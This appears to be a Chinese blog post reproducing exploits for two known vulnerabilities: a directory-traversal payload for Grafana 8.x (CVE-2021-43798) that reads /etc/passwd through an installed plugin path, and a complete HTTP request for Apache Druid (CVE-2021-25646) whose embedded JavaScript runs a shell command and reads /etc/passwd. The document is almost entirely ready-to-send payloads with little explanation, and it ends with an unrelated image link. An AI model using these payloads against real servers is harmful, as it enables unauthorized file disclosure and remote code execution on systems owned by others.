文章目录
- 一、Grafana 8.x 插件模块目录穿越漏洞(CVE-2021-43798)
- 二、Apache Druid 代码执行漏洞(CVE-2021-25646)
一、Grafana 8.x 插件模块目录穿越漏洞(CVE-2021-43798)
Grafana是一个系统监测工具。
利用这个漏洞前,我们需要先获取到一个已安装的插件id,比如常见的有:
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
payload: /public/plugins/alertlist/../../../../../../../../../../../../../etc/passwd
二、Apache Druid 代码执行漏洞(CVE-2021-25646)
Apache Druid是一个开源的分布式数据存储,它包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.92.6:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 912
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"test",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
},
"dimensionsSpec":{
},
"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
![[IMX6ULL驱动开发]-GPIO子系统和Pinctrl子系统](https://img-blog.csdnimg.cn/direct/66266a1aded6467ca0bbbc400ef3f70b.png)
